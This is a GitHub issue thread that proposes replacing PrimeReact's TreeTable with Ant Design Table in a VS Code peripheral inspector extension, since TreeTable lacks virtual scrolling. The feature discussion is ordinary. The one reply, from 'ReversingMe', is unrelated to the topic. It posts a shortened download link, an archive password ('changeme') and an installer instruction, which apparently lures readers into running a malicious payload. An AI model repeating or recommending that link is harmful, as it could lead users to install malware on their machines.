### ISSUE TITLE
Consider Ant Design Table as UI Framework

### ISSUE THREAD

**Issue by martin-fleck-at** [eclipse-cdt-cloud/vscode-peripheral-inspector#27]
Type: Feature Request

In [PR #24](https://github.com/eclipse-cdt-cloud/vscode-peripheral-inspector/pull/24), we are introducing a replacement for the Microsoft Tree View. This new implementation aims to closely align with the existing Tree API while extending it to support tree tables, facilitating easier migration and offering enhanced control and capabilities. The UI rendering is handled by [PrimeReact](https://primereact.org/), focusing primarily on the [Tree](https://primereact.org/tree/) and [TreeTable](https://primereact.org/treetable/) components.

During the PR review, we identified potential performance issues with the TreeTable component, particularly due to the lack of [Virtual Scrolling](https://github.com/primefaces/primereact/issues/1423). As a result, we opted to use the Tree component instead, which offers better performance. However, this choice introduces some functional and visual limitations, particularly the loss of the column-like behavior inherent to TreeTable.

To address this, I propose investigating alternatives to PrimeReact's TreeTable, specifically considering the [Ant Design Table](https://ant.design/components/table/) as a potential replacement. Since other functionalities, such as [search](https://github.com/eclipse-cdt-cloud/vscode-peripheral-inspector/issues/23), [inline-editing](https://github.com/eclipse-cdt-cloud/vscode-peripheral-inspector/issues/16), and [custom controls](https://github.com/eclipse-cdt-cloud/vscode-peripheral-inspector/issues/22), are partially dependent on the UI framework, it would be prudent to conduct this investigation before further feature development.

I would like to open this topic for discussion.

**Comment by ReversingMe** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
